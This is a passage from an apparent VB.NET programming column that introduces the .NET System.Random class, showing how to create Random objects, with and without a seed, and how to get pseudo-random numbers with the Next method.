//The amount to increase/decrease the size of the original sprite.
private float mScale = 1.0f;
The AssetName is a public object used to store the name of the image to be loaded from the Content Pipeline for this sprite. Size is a public object used to give the current size of the sprite after the scale has been applied. mScale is a private object that will tell the Draw method how much to shrink or enlarge the sprite from it's original size.
Next, we're going to add a property to the class. Properties are often used when you have some other things to do when the value of an object changes. In our case, when the scale of the sprite is changed, we need to recalculate the Size of the sprite with that new scale applied.
Add the following property to the Sprite class.
//When the scale is modified through the property, the Size of the
//sprite is recalculated with the new scale applied.
public float Scale
{
    get { return mScale; }
    set
    {
        mScale = value;

        //Recalculate the Size of the Sprite with the new scale
        Size = new Rectangle(0, 0, (int)(mSpriteTexture.Width * Scale), (int)(mSpriteTexture.Height * Scale));
    }
}
The LoadContent method of the Sprite class needs to be enhanced as well. Modify the LoadContent method of the Sprite class so that, after the texture is loaded, it stores the asset name passed in (the parameter is called theAssetName here) and calculates the sprite's initial size:

AssetName = theAssetName;
Size = new Rectangle(0, 0, (int)(mSpriteTexture.Width * Scale), (int)(mSpriteTexture.Height * Scale));

We added the storing of the asset name and the initial calculation of the Sprite's size.
Our sprites need to be able to move, so we are going to add a new "Update" method to the class to help us do that. Add the following new Update method to the Sprite class.
//Update the Sprite and change its position based on the passed in speed, direction and elapsed time.
public void Update(GameTime theGameTime, Vector2 theSpeed, Vector2 theDirection)
{
    Position += theDirection * theSpeed * (float)theGameTime.ElapsedGameTime.TotalSeconds;
}
Movement is a simple calculation of taking the direction the sprite should be moving in, the speed they should be moving and multiplying those by the time that has elapsed then adjusting the original position with that result.
theDirection is a Vector2 object. A value of -1 in the X value of the Vector2 will indicate something should be moving to the left. A value of 0 indicates it's not moving at all along the X axis. And a value of 1 indicates the sprite should be moving to the right. The same goes for the Y value of the Vector2. A -1 indicates the sprite needs to move up, 0 not moving in the Y direction and 1 means it's moving down. Combinations of X,Y values cause the sprite to move along both the X, Y axis.
theSpeed is how fast the sprite should move in a along a given axis. Value of 0 means it has no speed along that axis, higher speeds make the sprite move faster along the given axis.
theGameTime is used to keep how fast the sprite moves consistent across different computers. By always moving by how much time has elapsed, if a computer's refresh rate is faster, the sprite should still move the same speed as it does on a computer with a slower refresh rate.
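As a usage sketch (the mWizard field and the speed value here are placeholders, not part of the tutorial yet), the game's own Update method could move the sprite to the right like this:

```csharp
// Move the Wizard to the right at 160 pixels per second
mWizard.Update(gameTime, new Vector2(160, 0), new Vector2(1, 0));
```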
With our sprite successfully changing position, now it's time to draw it to the screen in that new position and with its potentially new scale. Modify the Draw method of the Sprite class so that the Scale value is passed along to the SpriteBatch.Draw call.
The SpriteBatch object has several different overrides for Draw (overrides are the same method, but they take additional parameters to give new functionality). In this case, we wanted to re-size the sprite up or down according to Scale so we're passing that in. We're using the defaults for all of the other parameters of that particular override. Eventually in the future we might use them, but for now, we just want to position and scale the sprite.
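The finished method isn't reproduced here, but a Draw method using that override would look roughly like this (the default values for rotation, origin, effects and layer depth are assumptions based on the description above):

```csharp
public void Draw(SpriteBatch theSpriteBatch)
{
    //Source rectangle covers the whole texture; rotation, origin,
    //effects and layer depth are left at their defaults, and Scale
    //resizes the sprite up or down.
    theSpriteBatch.Draw(mSpriteTexture, Position,
        new Rectangle(0, 0, mSpriteTexture.Width, mSpriteTexture.Height),
        Color.White, 0.0f, Vector2.Zero, Scale, SpriteEffects.None, 0);
}
```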
That's it for the changes to the Sprite class for now. Do a quick Build now to make sure all the changes compile correctly. Nothing will be different in the game yet, but it's good to make sure you don't have any errors before you get too much further.
Adding the Wizard class:
We're going to be moving a Wizard character around on the screen (you added the image for the Wizard to the project earlier). The Wizard is going to be a sprite, but he's going to have some additional functionality special to him as well. To do that, we're going to create a new class called "Wizard" and then inherit from the Sprite class. Inheriting gives you the functionality of the other class and allows you to add to that functionality. It's the basis of object oriented programming.
Right-click on the game project in the Solution Explorer. Select "Add", then pick "Class" from the Add sub-menu. This will open the "Add New Item" dialog. Type in the name "Wizard" for your class and click the "Add" button.
Now we need to start adding some functionality to the Wizard class. Let's start by adding our XNA framework "using" statements to the top of the Wizard class file.
Add the following "using" statements.
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Storage;
using Microsoft.Xna.Framework.Input;
using Microsoft.Xna.Framework.Content;
using Microsoft.Xna.Framework.Graphics;
These just help with the readability of our code so we don't have to type so much to get at the objects provided to us by the XNA framework. For example, we can use Vector2 instead of having to type Microsoft.Xna.Framework.Vector2 every time we want to use that object.
It is now time to indicate that we want to inherit from the Sprite class. Change the class declaration for the Wizard to look like the following.
class Wizard : Sprite
The Wizard class now inherits from the Sprite class and has access to all of its public and protected members and methods.
We're going to be using some values in the class over and over again that do not change, so we're going to make these constants of our class. It's a good programming practice to get into the habit of removing "magic" numbers and strings from your code and moving them into variables and constants. A magic number or string is any value that is just magically in your code with no real explanation of what the value is or why it's that value.
Add the following constants to the top of the Wizard class.
const string WIZARD_ASSETNAME = "WizardSquare";
const int START_POSITION_X = 125;
const int START_POSITION_Y = 245;
const int WIZARD_SPEED = 160;
const int MOVE_UP = -1;
const int MOVE_DOWN = 1;
const int MOVE_LEFT = -1;
const int MOVE_RIGHT = 1;
Now let's add some more class level objects that will help give us the functionality we need to move our Wizard sprite around.
Add the following objects to the top of the Wizard class.
enum State
{
    Walking
}

State mCurrentState = State.Walking;
Vector2 mDirection = Vector2.Zero;
Vector2 mSpeed = Vector2.Zero;
KeyboardState mPreviousKeyboardState;
The State enum is used to store the current "state" of the sprite. What is state? You can think of state as any type of action you need to keep track of for your sprite, because it might limit another action or "state". So if the sprite was dead, powered up, jumping, ducking, etc., those might all be "states" your Wizard could be in, and you might want to check whether the Wizard was in (or not in) a given state before you do something or draw something to the screen.
Currently, our Wizard only has one state, "Walking". mCurrentState is used to track the current state of the sprite and it's set to "Walking" when it's created.
mDirection is used to store the Direction the Wizard is moving in and mSpeed is used to store the Speed the sprite is moving at in those directions.
mPreviousKeyboardState is used to store the state the keyboard was in the last time we checked. This is useful for times when we don't want to repeat an action unless a player has pressed a key on the keyboard again, instead of just holding it down. Knowing the previous state of the keyboard, we can verify the key was released before but is now pressed, and then do whatever action we need to do for that key.
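As a quick illustration (this snippet is not part of the tutorial's Wizard class), a "just pressed" check compares the current and previous states:

```csharp
// Fires only on the frame the key goes down, not while it is held.
if (aCurrentKeyboardState.IsKeyDown(Keys.Space) == true
    && mPreviousKeyboardState.IsKeyDown(Keys.Space) == false)
{
    // Do the one-shot action here.
}
```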
The Wizard needs to load the new Wizard image, so we're going to model after the base sprite class and add a LoadContent method to the Wizard. Add the following LoadContent method to the Wizard class.
public void LoadContent(ContentManager theContentManager)
{
    Position = new Vector2(START_POSITION_X, START_POSITION_Y);
    base.LoadContent(theContentManager, WIZARD_ASSETNAME);
}
The LoadContent method for the Wizard class does not take in an asset name like the Sprite class does. This is because the Wizard class already knows what asset it needs to load. So first, it sets the initial position of the Wizard (using the constants we declared for the starting X and Y positions) and then it calls the LoadContent method of the base Sprite class it inherits from. It passes into the base LoadContent method the content manager it received when its own LoadContent method was called, along with the constant we declared for the asset name. The LoadContent method of the Sprite class will now run and execute all of its code.
Now, we need to add an "Update" method to the Wizard class. This method will take care of checking for input and moving the sprite around. Add the following Update method to the Wizard class.
public void Update(GameTime theGameTime)
{
    KeyboardState aCurrentKeyboardState = Keyboard.GetState();

    UpdateMovement(aCurrentKeyboardState);

    mPreviousKeyboardState = aCurrentKeyboardState;

    base.Update(theGameTime, mSpeed, mDirection);
}
The Update method first gets the current state of the keyboard. This is built-in functionality of the XNA framework: by calling Keyboard.GetState(), the XNA framework will report to you all the keys that are pressed and not pressed on the keyboard.
Next, we call a method "UpdateMovement" passing in the current keyboard state. We haven't written this method yet, but we will shortly.
Then, we store the state of the keyboard in our mPreviousKeyboardState object. This will help us when we get to the point that we need to verify that a key was released and then pressed again. We won't be using this functionality in this tutorial, but it's a good habit to get into, so that the information is available when checking keyboard input; you're bound to need it eventually.
Finally, we call the Update method of the Sprite class we are inheriting from. We pass in the time that has elapsed and the current values for the Speed and Direction of the Wizard. The Update method of the Sprite class will then use those values to adjust the position of the sprite.
That's it for the Update method, but in it we called an "UpdateMovement" method that didn't exist. Let's go ahead and add that method now. This method will handle all of the checking to see if one of the movement keys was pressed, and then set the movement variables for the sprite.
Add the following "UpdateMovement" method to the Wizard class.
private void UpdateMovement(KeyboardState aCurrentKeyboardState)
{
    if (mCurrentState == State.Walking)
    {
        mSpeed = Vector2.Zero;
        mDirection = Vector2.Zero;

        if (aCurrentKeyboardState.IsKeyDown(Keys.Left) == true)
        {
            mSpeed.X = WIZARD_SPEED;
            mDirection.X = MOVE_LEFT;
        }
        else if (aCurrentKeyboardState.IsKeyDown(Keys.Right) == true)
        {
            mSpeed.X = WIZARD_SPEED;
            mDirection.X = MOVE_RIGHT;
        }

        if (aCurrentKeyboardState.IsKeyDown(Keys.Up) == true)
        {
            mSpeed.Y = WIZARD_SPEED;
            mDirection.Y = MOVE_UP;
        }
        else if (aCurrentKeyboardState.IsKeyDown(Keys.Down) == true)
        {
            mSpeed.Y = WIZARD_SPEED;
            mDirection.Y = MOVE_DOWN;
        }
    }
}
The UpdateMovement method is the key method of getting our Wizard sprite to move around. First it checks to make sure the Wizard is in a current state for Walking. Our Wizard can currently ONLY be in a Walking state, but there might be times in the future when we don't want to move him around if he's not currently in a Walking state so we check.
Next, we zero out his direction and speed. Vector2.Zero is a quick and easy way of saying create a new Vector2(0,0). Now we start checking to see what keys are pressed. First we check to see if the Left arrow key or the Right arrow key is pressed. If they are, then we set the Speed along the X axis and indicate the direction. Then we check to see if the Up arrow or the Down arrow are pressed. And again, if they are, then we set the Speed along the Y axis and indicate the direction.
Now, when the base.Update of the Sprite class is called (which happens in our Update method already), the new values for our Wizard speed and direction will be passed and our Wizard sprite will move appropriately.
Do a quick Build to make sure the Wizard class compiles correctly with no errors. You won't see the Wizard on the screen yet (if you're building this off the "Creating a 2D Sprite" project, you should still just see the sprites drawn to the screen, and you won't be able to move them). So we still have some final changes to make. We need to change the Game1.cs class to use our new Wizard class instead of the Sprite class.
Modifying the Game1.cs Class:
We want to remove references to just using the Sprite class and instead use our Wizard class. So to do that we're going to be deleting some code and then adding some new code to replace it.
Delete the following lines of code from the top of the Game1.cs class
Sprite mSprite;
Sprite mSpriteTwo;
Now add the following line of code to the top of the Game1.cs class.
Wizard mWizardSprite;
Now, modify the Initialize method, to look like the following.
protected override void Initialize()
{
    // TODO: Add your initialization logic here
    mWizardSprite = new Wizard();

    base.Initialize();
}
This will create a new instance of our Wizard sprite (and we removed the old lines of code that were creating new instances of the Sprite class).
We now need to load the content of our Wizard. Modify the LoadContent method of the Game1.cs class to look like the following.
protected override void LoadContent()
{
    // Create a new SpriteBatch, which can be used to draw textures.
    spriteBatch = new SpriteBatch(GraphicsDevice);

    // TODO: use this.Content to load your game content here
    mWizardSprite.LoadContent(this.Content);
}
With our Wizard sprite content loaded, let's add in the ability for the Game1.cs class to "Update" the Wizard. Modify the Update method to look like the following.
protected override void Update(GameTime gameTime)
{
    // Allows the game to exit
    if (GamePad.GetState(PlayerIndex.One).Buttons.Back == ButtonState.Pressed)
        this.Exit();

    // TODO: Add your update logic here
    mWizardSprite.Update(gameTime);

    base.Update(gameTime);
}
Finally, we want to draw our Wizard. Modify the Draw method of the Game1.cs class to look like the following.
protected override void Draw(GameTime gameTime)
{
    graphics.GraphicsDevice.Clear(Color.CornflowerBlue);

    // TODO: Add your drawing code here
    spriteBatch.Begin();
    mWizardSprite.Draw(this.spriteBatch);
    spriteBatch.End();

    base.Draw(gameTime);
}
Now that we have appropriately modified the Game1.cs class to use our new Wizard class, do a Build and see your results. The Wizard should now be drawn to the screen and you should be able to move him around with the Up, Down, Left and Right arrow keys.
Congratulations! You have successfully figured out how to make a sprite move around the screen in your game. Can you think of some things you can change? Could you add the old Sprites back in and draw them to the screen? What do you think would happen if you tried to add two wizards to the game?
Play with it, experiment and ask questions. Most of all make sure you’re having fun!
Download the source for this project.
Leave comments and feedback for this project on my blog post.
XNADevelopment.com is in no way affiliated with Microsoft. | http://www.xnadevelopment.com/tutorials/thewizard/theWizard.shtml | crawl-001 | refinedweb | 2,875 | 73.58 |
Odoo Help
It is really hard to show, or I know nothing about Odoo.
Add to your model something like this
import json

@api.one
def _compute_amount_each_currency(self):
    sums = dict([(l.currency_id.name, 0) for l in self.expense_ticket_line_ids])
    for line in self.expense_ticket_line_ids:
        sums[line.currency_id.name] += line.amount_currency
    self.amount_each_currency = json.dumps(sums)

amount_each_currency = fields.Text(compute='_compute_amount_each_currency')
So we have got the field with the sums for each currency. This is the easiest part.
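The aggregation itself is plain Python and can be sketched independently of Odoo; the function name and the list-of-pairs input here are illustrative, not Odoo API:

```python
from collections import defaultdict

def totals_by_currency(lines):
    """Sum amounts grouped by currency code.

    `lines` is an iterable of (currency_code, amount) pairs, standing in
    for the (line.currency_id.name, line.amount_currency) values above.
    """
    sums = defaultdict(float)
    for currency, amount in lines:
        sums[currency] += amount
    return dict(sums)

print(totals_by_currency([("USD", 10), ("USD", 5), ("EUR", 50), ("CNY", 100)]))
# -> {'USD': 15.0, 'EUR': 50.0, 'CNY': 100.0}
```

The resulting dict can then be serialized with json.dumps exactly as the compute method does.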
And now show time!
I'm still upset that <templates> is available only in a kanban view. Am I right?
So in a form view I see only two ways. The first is to add another text field with appropriate text like 'Totals EUR: xxx, CYN: xxx, USD: xxx' in one line and add this field to the view. Ugly, but I can't find another way.
A report is more flexible and here we can make it nice looking. Create a model with the render_html function
class ReportSometing(models.AbstractModel):

    @api.one
    def render_html(self, data=None):
        [...]
        if objects[0]:
            sums = json.loads(objects[0].amount_each_currency)
            sums = [[key, value] for key, value in sums.items()]
        else:
            sums = []
        docargs = {
            'sums': sums,
        }
        [...]
and convert the field with each currency totals into the list of lists of a currency name and its amount.
Insert into the report something like the following and get the profit.
<t t-foreach="sums" t-as="s">
    <p><t t-esc="s[0]"/> <t t-esc="s[1]"/></p>
</t>
Season with any decoration.
Well... the second way is to create a separate table with sums for each currency, like the class AccountInvoiceLine(models.Model). The code is only a brief sketch; I did not test the whole idea.
class ExpenseTicket(models.Model):
    expense_ticket_currency_ids = fields.One2many('expense.ticket.currency', 'expenseticket_id')


class ExpenseTicketCurrency(models.Model):
    _name = "expense.ticket.currency"

    expenseticket_id = fields.Many2one('expense.ticket', string='', ondelete='cascade', index=True)
    currency_id = fields.Many2one('res.currency', string='Currency')
    amount_currency = fields.Monetary(string='Amount', currency_field='currency_id')
In a view we can use 'tree'
<field name="expense_ticket_currency_ids">
<tree string="">
<field name="currency_id"/>
<field name="amount_currency"/>
</tree>
</field>
The last part is to write functions to store data into ExpenseTicketCurrency.
Question again
There are some products(services type) on the sales order line of the same sales order, which are in different currencies.
How to sum them group by different currencies and show on sale order form?
E.g:
Ocean Freight USD 10.00
Truck charge USD 5.00
Documents Fee EUR 50.00
Discharge Fee CNY 100
Total : USD xx.xx
EUR xx.xx
CNY xx.xx
Any good idea?
The answer is below. I do not know your format of invoice lines but referring to invoice lines of the standard accounting module the code should be changed and added to '_compute_amount(self)' of the AccountInvoice.
amount_untaxed_sums = dict([(l.currency_id.name, 0) for l in self.invoice_line_ids])
for line in self.invoice_line_ids:
    amount_untaxed_sums[line.currency_id.name] += line.price_subtotal
I did not test the code in Odoo but it should work.
About This Community
Odoo Training Center
Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
Currency comes from the price list, and you can only select one currency for a price list... so how are you going to set these three currencies in the same SO?
in which currency you want the sum??
Thanks for your reply. There is only one currency on the same sales order, which does not meet my requirements. I need multiple currencies on the same sales order.
So you may have customized SO line to set different currency in each line..
You have to enable multi currency and one of them should be Base..
you haven't said which one is your base currency, i.e. in which currency you want the sum
My base currency is CNY, Now I can sum the base currency. In addition I need to sum these foreign currency lines
if you have currency field in SO line...then you can calculate total easily
usd_total = eur_total = cny_total = 0.0
for line in self.order_line:
    if line.currency_id.name == 'USD':
        usd_total += line.subtotal
    elif line.currency_id.name == 'EUR':
        eur_total += line.subtotal
    elif line.currency_id.name == 'CNY':
        cny_total += line.subtotal
like this
super!I'll try it! Thanks
Make it as answer if you succeed
okay. | https://www.odoo.com/forum/help-1/question/how-to-sum-of-them-separate-from-currencies-110285 | CC-MAIN-2018-26 | refinedweb | 732 | 62.54 |
In the past, I have written code similar to that in the related Tip, but for any who like Regular Expressions, here is a Regular Expression that will split a string into segments with a maximum length, but which has the ability to split on "breaks" so words aren't broken up: (?s).{1,314}(?=(\b|$))
(?s).{1,314}(?=(\b|$))
private static System.Collections.Generic.IEnumerable<string> Segment(string text, int maxlen)
{
    string regex = System.String.Format(@"(?s).{{1,{0}}}(?=(\b|$))", maxlen);
    System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(regex);
    System.Text.RegularExpressions.MatchCollection m = reg.Matches(text);
    for (int i = 0; i < m.Count; i++)
    {
        yield return m[i].Value;
    }
    yield break;
}
int MAX_CHARS_TO_SHOW = 314;
string msg = "...";  // the original sample text did not survive; substitute any long string

foreach (string s in Segment(msg, MAX_CHARS_TO_SHOW))
{
    System.Console.WriteLine(s);
}
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
Load balancing
This is an extension of what is described in the related HowTo: it extends part 2 with a second option, where the chosen LTSP server is not random but the least utilized one.
Option 2
The second option is more advanced: it gives you a server list generated by querying ldminfod for the server rating. By querying ldminfod, you can get the current rating of the server. This rating goes from 0 to 100; higher is better. For this to work, you have to use the Ubuntu version of ldminfod. (remark from h01ger: which version of Ubuntu? it looks like Debian lenny is enough too?) The Skolelinux version doesn't have the server rating function.
First you should make a backup of the original ldminfod file, which is in /usr/sbin/. Then put the following script in a new ldminfod file. Make sure the new file has the same permissions as the old one.
import sys
import os
import locale
from subprocess import *

def get_memory_usage():
    memusg = {}
    # Get memory usage information, according to /proc/meminfo
    f = open('/proc/meminfo', 'r')
    swap_free = 0
    mem_physical_free = 0
    mem_buffers = 0
    mem_cached = 0
    for line in f.readlines():
        tokens = line.split()
        label = tokens[0]
        size = tokens[1]
        try:
            size = int(size)
        except:
            # The line is a header, skip it.
            continue
        # We approximate kb to bytes
        size = size * 1024
        if label == 'MemTotal:':
            memusg['ram_total'] = size
        elif label == 'MemFree:':
            mem_physical_free = size
        elif label == 'Buffers:':
            mem_buffers = size
        elif label == 'Cached:':
            mem_cached = size
        elif label == 'SwapTotal:':
            memusg['swap_total'] = size
        elif label == 'SwapFree:':
            swap_free = size
    f.close()
    memusg['ram_used'] = memusg['ram_total'] - mem_physical_free - mem_buffers - mem_cached
    memusg['swap_used'] = memusg['swap_total'] - swap_free
    return memusg

def get_load_average():
    # Gets the current system load, according to /proc/loadavg
    loadavg = {}
    load_file = open('/proc/loadavg')
    load_infos = load_file.read().split()
    loadavg['one_min_avg'] = load_infos[0]
    loadavg['five_min_avg'] = load_infos[1]
    loadavg['fifteen_min_avg'] = load_infos[2]
    # scheduling_info = load_infos[3]  # not used
    # last_pid = load_infos[4]
    load_file.close()
    return loadavg

def compute_server_rating():
    """Compute the server rating from its state

    The rating is computed by using load average and the memory used.
    The returned value is between 0 and 100, higher is better
    """
    max_acceptable_load_avg = 8.0
    mem = get_memory_usage()
    load = get_load_average()
    rating = 100 - int(
        50 * (float(load['fifteen_min_avg']) / max_acceptable_load_avg)
        + 50 * (float(mem['ram_used']) / float(mem['ram_total'])))
    if rating < 0:
        rating = 0
    return rating

def get_sessions(dir):
    """Get a list of available sessions.

    Returns a list of sessions gathered from .desktop files
    """
    sessions = []
    if os.path.isdir(dir):
        for f in os.listdir(dir):
            if f.endswith('.desktop') and os.path.isfile(os.path.join(dir, f)):
                x = {}
                for line in file(os.path.join(dir, f), 'r').readlines():
                    if 'Exec=' in line:
                        variable, value = line.split('=')
                        x[variable] = value
                if 'TryExec' in x:
                    sessions.append(x['TryExec'].rstrip())
                elif 'Exec' in x:
                    sessions.append(x['Exec'].rstrip())
    return sessions

if __name__ == "__main__":
    # Get the server's default locale
    # We want it to appear first in the list
    try:
        lines = Popen(['locale'], stdout=PIPE).communicate()[0]
    except OSError:
        print "ERROR: failed to run locale"
        sys.exit(0)
    for line in lines.split():
        if line.startswith('LANG='):
            defaultlocale = line.split('=')[1].strip('"')
            defaultlocale = defaultlocale.replace('UTF8', 'UTF-8')
            print "language:" + defaultlocale
    # Get list of valid locales from locale -a
    try:
        lines = Popen(['locale', '-a'], stdout=PIPE).communicate()[0]
    except OSError:
        print "ERROR"
        sys.exit(0)
    langs = lines.split(None)
    langs.sort()
    for lang in langs:
        lang = lang.rstrip()
        if lang.endswith('.utf8'):
            # locale returns .utf8 when we want .UTF-8
            lang = lang.replace('.utf8', '.UTF-8')
        else:
            # if locale did not end with .utf8, do not add to list
            continue
        if lang != 'POSIX' and lang != 'C' and lang != defaultlocale:
            print "language:" + lang
    try:
        lines = get_sessions('/usr/share/xsessions/')
    except OSError:
        print "ERROR"
        sys.exit(0)
    for line in lines:
        print "session:" + line
    # Get the rating of this server
    rate = 0
    try:
        rate = compute_server_rating()
    except:
        print "ERROR"
        sys.exit(0)
    print "rating:" + str(compute_server_rating())
Now you have to edit "/opt/ltsp/i386/etc/lts.conf" and add this:
MY_SERVERS = .
LIST=""
# Load query on all servers
for i in $MY_SERVERS; do
    LOAD=`nc $i 9571 | grep rating | cut -d: -f2`
    if test $LOAD; then
        # add to the list
        LIST="$LIST$LOAD $i\n"
    fi
done
# Now LIST contains the list of servers sorted by load
LIST=`echo -e $LIST | sort -nr`
# Check if the 1st items have the same load. If so, randomly choose one.
OLDIFS=$IFS
IFS="
"
BESTLIST=( )
I=0
for LINE in $LIST; do
    LOAD=`echo $LINE | cut -f 1 -d " "`
    if [ "$OLDLOAD" -a "$LOAD" != "$OLDLOAD" ]; then
        break
    fi
    BESTLIST[$I]="$LINE"
    OLDLOAD=$LOAD
    I=$((I+1))
done
RAND=$(( $RANDOM % $I ))
# print the chosen host
echo ${BESTLIST[$RAND]} | cut -f 2 -d " "
exit 0
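The selection logic, sort by rating and then pick randomly among the top-rated hosts, can also be sketched in Python (this helper is illustrative, not part of the Debian Edu scripts; it assumes you already fetched each server's rating from ldminfod on port 9571):

```python
import random

def pick_server(ratings):
    """Pick one of the highest-rated servers at random.

    `ratings` maps hostname -> rating (0-100, higher is better).
    Returns None when no server answered.
    """
    if not ratings:
        return None
    best = max(ratings.values())
    # All hosts tied for the best rating are equally good candidates.
    candidates = [host for host, rating in ratings.items() if rating == best]
    return random.choice(candidates)

print(pick_server({"tjener": 40, "ltsp1": 85, "ltsp2": 85}))  # prints "ltsp1" or "ltsp2"
```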
Documentation ¶
Overview ¶
Package framework contains a high-level framework for implementing Sentinel imports with Go.
The direct sdk.Import interface is a low-level interface that is tedious, clunky, and difficult to implement correctly. The interface is this way to assist in the performance of imports while executing Sentinel policies. This package provides a high-level API that eases import implementation while still supporting the performance-sensitive interface underneath.
Imports are generally activated in this framework by serving the plugin with the root namespace embedded in Import:
package main import ( "github.com/hashicorp/sentinel-sdk" "github.com/hashicorp/sentinel-sdk/rpc" ) func main() { rpc.Serve(&rpc.ServeOpts{ ImportFunc: func() sdk.Import { return &framework.Import{Root: &root{}} }, }) }
The plugin framework is based around the concept of namespaces. Root is the entrypoint namespace and must be implemented as a minimum. From there, nested access may be delegated to other Namespace implementations.
Namespaces outside of the root must at least implement the Namespace interface. All namespaces, including the root, may implement the optional Call or Map interfaces, to support function calls or selective memoization calls, respectively.
Root namespaces are generally global, that is, for the lifetime of the execution of Sentinel, one single import Root namespace state will be shared by all policies that need to be executed. Take care when storing state in the Root namespace. If you require state in the Root namespace that must be unique across policy executions, implement the NamespaceCreator interface.
The Root namespace (or the NamespaceCreator interface, which embeds Root) may optionally implement the New interface, which allows for the construction of namespaces via the handling of arbitrary object data. New is ignored for namespaces past the root.
Non-primitive import return data is normally memoized, including for namespaces. This prevents expensive calls over the plugin RPC. Memoization can be controlled by a couple of methods:
* Implementing the Map interface allows for the explicit return of a map of values, sidestepping struct memoization. Normally, this is combined with the MapFromKeys function which will call Get for each defined key and add the return values to the map. Note that multi-key import calls always bypass memoization - so if foo.bar is a namespace that implements Map but foo.bar.baz is looked up in a single expression, it does not matter if baz is excluded from Map.
* Struct memoization is implicit otherwise. Only exported fields are acted on - fields are lower and snake cased where applicable. To control this behavior, you can use the "sentinel" struct tag. sentinel:"NAME" will alter the field to have the name indicated by NAME, while an empty string will exclude the field.
Additionally, there are a couple of nuances that the plugin author should be cognizant of:
* nil values within slices, maps, and structs are converted to nulls in the return object.
* Returning a nil from a Get call is undefined, not null.
The author can alter this behavior explicitly by assigning or returning the sdk.Null and sdk.Undefined values.
Types ¶
type Call ¶
type Call interface { Namespace // Func returns a function to call for the given string. The function // must take some number of arguments and return (interface{}, error). // The argument types may be Go types and the framework will handle // conversion and validation automatically. // // The returned function may also return only interface{}. In this case, // it is assumed an error scenario is impossible. Any other number of // return values will result in an error. // // This should return nil if the key doesn't support being called. Func(string) interface{} }
Call is a Namespace that supports call expressions. For example, "time.now()" would invoke the Func function for "now".
type Import ¶
type Import struct { // Root is the implementation of the import that the user of the // framework should implement. It represents the minimum necessary // implementation for an import. See the docs for Root for more details. Root Root // contains filtered or unexported fields }
Import implements sdk.Import. Configure and return this structure to simplify implementation of sdk.Import.
func (*Import) Configure ¶
plugin.Import impl.
type Map ¶
type Map interface { Namespace // Map returns the entire map for this value. The return value // must only contain values convertable by lang/object.ToObject. It // cannot contain functions or other framework interface implementations. Map() (map[string]interface{}, error) }
Map is a Namespace that supports returning the entire map of data. For example, if "time.pst" implemented this, then the writer of a policy may request "time.pst" and get the entire value back as a map.
type Namespace ¶
type Namespace interface { // Get requests the value for a specific key. This must return a value // convertable by lang/object.ToObject or another Interface value. // // If the value doesn't exist, nil should be returned. This will turn // into "undefined" eventually in the Sentinel policy. If you want to // return an explicit "null" value, please return object.Null directly. // // If an Interface implementation is returned, this is treated like // a namespace. For example, "time.pst" may return an Interface since // the value itself expects further keys such as ".hour". Get(string) (interface{}, error) }
Namespace represents a namespace of attributes that can be requested by key. For example in "time.pst.hour, time.pst.minute", "time.pst" would be a namespace.
Namespaces are either represented or returned by the Root implementation. Root is the top-level implementation for an import. See Import and Root for more details.
A Namespace on its own doesn't allow accessing the full mapping of keys and values. Map may be optionally implemented to support this. Following the example in the first paragraph of this documentation, "time.pst" itself wouldn't be allowed for a Namespace on its own. If the implementation also implements Map, then "time.pst" would return a complete mapping.
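To make the delegation concrete, here is a simplified, self-contained sketch of the pattern. The Namespace interface below is a local stand-in for illustration only; the real interface and its plumbing live in the sentinel-sdk framework package, and the "time"/"pst" names are hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// Namespace is a simplified local stand-in for framework.Namespace.
type Namespace interface {
	Get(key string) (interface{}, error)
}

// pst is a nested namespace, reachable as "pst" under the root.
type pst struct{ hour, minute int }

func (p *pst) Get(key string) (interface{}, error) {
	switch key {
	case "hour":
		return p.hour, nil
	case "minute":
		return p.minute, nil
	}
	return nil, nil // unknown key -> undefined
}

// timeRoot is the root namespace of a hypothetical "time" import.
type timeRoot struct{}

func (*timeRoot) Get(key string) (interface{}, error) {
	if key == "pst" {
		// Returning another Namespace delegates the rest of the lookup.
		return &pst{hour: 14, minute: 30}, nil
	}
	return nil, nil
}

// lookup walks a dotted path such as "pst.hour" through nested
// namespaces, mimicking what the framework does for "time.pst.hour".
func lookup(ns Namespace, path string) (interface{}, error) {
	var cur interface{} = ns
	for _, part := range strings.Split(path, ".") {
		n, ok := cur.(Namespace)
		if !ok {
			return nil, fmt.Errorf("%q is not a namespace", part)
		}
		v, err := n.Get(part)
		if err != nil {
			return nil, err
		}
		cur = v
	}
	return cur, nil
}

func main() {
	v, _ := lookup(&timeRoot{}, "pst.hour")
	fmt.Println(v) // 14
}
```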
type NamespaceCreator ¶
type NamespaceCreator interface { Root // Namespace is called to return the root namespace for accessing keys. // // This will be called once for each policy execution. If data and access // is shared by all policy executions (such as static data), then you // can return a singleton value. // // If each policy execution should maintain its own state, then this // should return a new value. Namespace() Namespace }
NamespaceCreator is an interface only used in conjunction with the Root interface. It allows the Root implementation to create a unique Namespace implementation for each policy execution.
This is useful for imports that maintain state per policy execution. For example for the "time" package, it may be useful for the state to be the current time so that all access returns a singular view of time for a policy execution.
If your import doesn't require per-execution state, Root should implement Namespace directly instead.
type New ¶ added in v0.3.0
type New interface { Namespace // New is called to construct new namespaces based on arbitrary // receiver data. // // The format of the object and the kinds of namespaces returned by // the constructor are up to the import author. // // Namespaces returned by this function must implement // framework.Map, or else errors will be returned on // post-processing of the receiver. // // New should return an error if there are issues instantiating the // namespace. This includes if the namespace cannot be determined // from the receiver data. Returning nil from this function will // return undefined to the caller. New(map[string]interface{}) (Namespace, error) }
New is an interface indicating that the namespace supports object construction via the handling of arbitrary object data. New is only supported on root namespaces, so either created through Root or NamespaceCreator.
The format of the object and the kinds of namespaces returned by the constructor are up to the import author.
type Root ¶
type Root interface { // Configure is called to configure this import with the operator // supplied configuration for this import. Configure(map[string]interface{}) error }
Root is the import root. For any import, there is only a single root. For example, if you're implementing an import named "time", then the "time" identifier itself represents the import root.
The root of an import is configurable and is able to return the actual interfaces uses for value retrieval. The root itself can never contain a value, be callable, return all mappings, etc.
A single root implementation and instance may be shared by many policy executions if their configurations match. | https://pkg.go.dev/github.com/hashicorp/sentinel-sdk@v0.3.12/framework | CC-MAIN-2022-21 | refinedweb | 1,388 | 50.53 |
Forum:Featured News Story?
From Uncyclopedia, the content-free encyclopedia
